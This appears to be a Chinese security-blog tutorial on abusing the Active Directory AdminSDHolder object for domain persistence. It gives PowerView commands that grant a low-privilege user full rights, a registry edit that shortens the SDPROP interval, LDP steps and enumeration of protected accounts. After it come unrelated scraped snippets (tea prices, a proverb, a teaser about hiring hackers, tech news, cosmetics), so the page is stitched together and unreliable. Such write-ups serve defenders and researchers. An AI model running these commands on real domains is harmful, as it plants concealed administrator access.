AdminSDHolder是一个特殊的AD容器,通常作为某些特权组成员的对象的安全模板。Active Directory将采用AdminSDHolder对象的ACL并定期将其应用于所有受保护的AD账户和组,以防止意外和无意的修改并确保对这些对象的访问是安全的。
本文由锦行科技的安全研究团队提供,旨在从攻击者的视角还原AdminSDHolder的渗透过程。
在域控上操作AdminSDHolder对象的ACL
添加用户test对AdminSDHolder的完全访问权限
powerview:
Add-DomainObjectAcl -TargetIdentity AdminSDHolder -PrincipalIdentity test -Rights All
*由于SDPROP的原因,默认等待60分钟之后生效
Powerview:
Get-DomainObjectAcl adminsdholder | ?{$_.SecurityIdentifier -match "S-1-5-21-363618500-3918876104-3124729890-1139"} | select objectdn,ActiveDirectoryRights |sort -Unique
ADSI:
Remove-DomainObjectAcl -TargetSearchBase "LDAP://CN=AdminSDHolder,CN=System,DC=test,DC=com" -PrincipalIdentity test -Rights All -Verbose
为了将可继承ACE的更改传播到后代对象,域控制器运行一个称为安全描述符传播器(SDPROP)的后台任务。通过修改对象的安全描述符或移动对象时触发此任务。当修改了AdminSDHolder的ACL之后默认等待60分钟以后生效,原理是SDPROP进程在PDC模拟器上每60分钟运行一次,并使用AdminSDHolder设置的安全权限重新标记ACL。
修改成等待60秒
reg add hklm\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v AdminSDProtectFrequency /t REG_DWORD /d 60
运行->LDP.exe->菜单>连接->连接->服务器输入当前的机器名,端口默认为389
然后连接->绑定凭证->作为当前登录的用户绑定->然后浏览->修改,在属性选项卡中输入FixUpInheritance。在值字段中输入Yes。操作选择添加,然后单击输入,最后运行即可,运行。
已经获得域控权限,利用AdminSDHolder来进行权限维持,或者寻找受保护AD账户为目标。
枚举受保护AD账户
Get-NetUser -AdminCount |select samaccountname
登录test用户,可以看到test非域管组,却能执行域管权限的命令。
观海听涛,字面意思就是观看大海的美景,倾听着波涛的声音。其实“观海听涛”说的是一种“不为物喜,不为己悲”的人生。 观海听涛的解释:观看大海的美景,倾听着波涛的声音。意指一种境界,不论做任何事,都要有一...
名匠存普升茶叶价格表批发价查询 存普升茶叶463斤 802元/提 存普升茶叶136克 6165元/袋 存普升茶叶113盒 3576元/斤 存普升茶叶51斤 714元/...
一、怎么攻击网站怎么找黑客 1、接单黑客来源路由允许发送者将数据包通过的路径写在数据包中,这样数据包就可以沿着不可预测的路径到达目的主机。怎么攻击网站榜中榜首先,我们应该知道,最好精通自己的产品。找黑...
想上传精彩视频与人分享其实很简单,只需要以下几个简单的步骤即可 1、磨刀不误砍柴工,首先要准备录屏软件(如果后期经常剪那你还会需要一个傻瓜式的剪辑软件),没有要推销广告的意思所以软件自行选...
中国北京时间12月4日早上信息,美国最高法院周五驳回申诉了iPhone明确提出的在国外禁卖三星(新浪微博)电子设备的规定。法院文档另外显示信息,iPhone曾向Nokia(新浪微博)和IBM出示一...
我们每天接触到的电子产品是非常的多,会长期接触辐射,空气中的粉尘和污染也是非常多,还有很多小仙女喜欢出门化妆,仅仅靠洗面奶是清洗不彻底的,这就不得不使用卸妆水了。...